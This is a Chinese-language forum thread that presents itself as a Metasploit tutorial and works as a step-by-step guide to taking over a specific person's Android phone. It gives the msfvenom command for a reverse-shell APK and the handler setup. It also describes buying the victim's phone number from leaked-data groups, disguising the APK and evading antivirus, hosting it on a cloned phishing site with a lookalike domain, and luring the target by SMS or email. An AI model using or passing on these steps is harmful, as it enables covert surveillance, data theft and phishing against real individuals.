挖虫洞的兔子吧 关注:16贴子:157
  • 13回复贴,共1

Metaspolit实用教学

只看楼主收藏回复

metaspolit分为主动攻击和🎣攻击两种方式达到个位的目的,不同之处在于。
主动攻击阶段:第一步,收集到目标ip也就是rhost的信息。
第二步,扫描漏洞,并激活漏洞。
第三步,选择适合该漏洞的攻击方式。
第四步,登陆对方设备并建立shell connect
完成对对方设备所有能动用权限的功能,包括对方相机,gps,社媒,一切。
虽然理论上你技术好,主动攻击几乎无解,但是这需要大量的时间沉淀和学习,并不适合很着急的各位。
而🎣攻击则简单的多,我以前解决我问题也靠的是这个方式。
主要阶段:
第一:了解对方设备平台,苹果还是安卓?
第二:登机找担保,推荐hwdb(虽然跑过大单)找到免费的sgk公群,下单要对方的手机号,测绑微信。
第三:使用msfvenom制作对应平台的🪵🚽,然后根据对方的思维(喜欢薅羊毛?喜欢抢票追星?安全警告?发挥想象力即可。)制作出🎣网站,并且更换下载链接。
第四:使用短信提示或者邮箱发送给对方,等待对方下载并运行。
考虑到大家的时间问题,本章节优先开始教学msfvenom相关内容,完成后将直接跳过metaspolit章节,进入实操准备阶段,后续回来再补充metaspolit其余内容。


IP属地:广东来自iPhone客户端1楼2024-04-24 22:09回复
    、蘸774xai128af2、无敌战神登场. . . 被楼主禁言,将不能再进行回复
    进入kali(确保你已经按装了metaspolit,没有就网上学下,我这里不介意使用图形化。


    IP属地:广东来自iPhone客户端2楼2024-04-24 22:10
    回复
      sudo su
      kali (登入root账户)
      service postgresql start(开启数据库)
      msfconsole (启动metaspolit)


      IP属地:广东来自iPhone客户端3楼2024-04-24 22:14
      回复
        注意,本章将已安卓手机为例


        IP属地:广东来自iPhone客户端4楼2024-04-24 22:15
        收起回复
          msfvenom -p android/meterpreter/reverse_ tcp LHOST=自己ip LPORT=8888(随便个ip0-10000随便选 R > 安装包名字.apk


          IP属地:广东来自iPhone客户端5楼2024-04-24 22:21
          回复
            然后从kali把这安装包拖出来,下载个andorid tool(懒人或者不在意安装包的一个图标的可以忽略此步骤),将apk拆包,更换压缩包及软件图标。及更改安装包内容,设置为开机自启,和安装后自动复制自身,具体教程网上查,百度有,这里不浪费篇幅。


            IP属地:广东来自iPhone客户端6楼2024-04-24 22:25
            回复
              将加工完的apk通过android tool重新打包成apk,并下载themida将apk拖入点protect做免杀处理。


              IP属地:广东来自iPhone客户端7楼2024-04-24 22:27
              回复
                随便找个你社会工程学里计划好的网页,有本事的可以自己搭建。找到网页后直接save as到桌面,然后拖家带口塞入kali,kali中找到它的html使用命令mousepad打开,ctrl+f搜索那个真的下载地址,找到后将储存在kali里面已经完成修改的apk下载地址扔上去,严谨点处理怕网址暴露的可以除了云虚拟机以外再购买专门的云服务器和域名,搞个高仿域名上传到网站后台。


                IP属地:广东来自iPhone客户端8楼2024-04-24 22:32
                回复
                  将修改好的html,又上传至你的服务器,云虚拟机也可以,但是效果就那样,还有很多点进去容易出乱码,修改起来还得学源码,所以建议云服务器和云虚拟机都来一份,一个长期用来监听,一个暴露在外头。


                  IP属地:广东来自iPhone客户端9楼2024-04-24 22:35
                  回复
                    准备工作做完后,重新打开(云主机)metaspolit
                    use exploit/multi/handler
                    Set android/meterpreter/reverse_tcp
                    set lhost 自己ip
                    set lport 8888上面文件生成时的端口
                    run


                    IP属地:广东来自iPhone客户端10楼2024-04-24 22:41
                    回复
                      然后喜闻乐见的,短信也好,邮件也罢,陌加也行。哄着对面下载打开,你就成功了。


                      IP属地:广东来自iPhone客户端11楼2024-04-24 22:42
                      收起回复
                        到此为止,被动渗透方面讲完,先讲别的,到后来再慢慢讲主动渗透方面的。


                        IP属地:广东来自iPhone客户端12楼2024-04-24 22:45
                        回复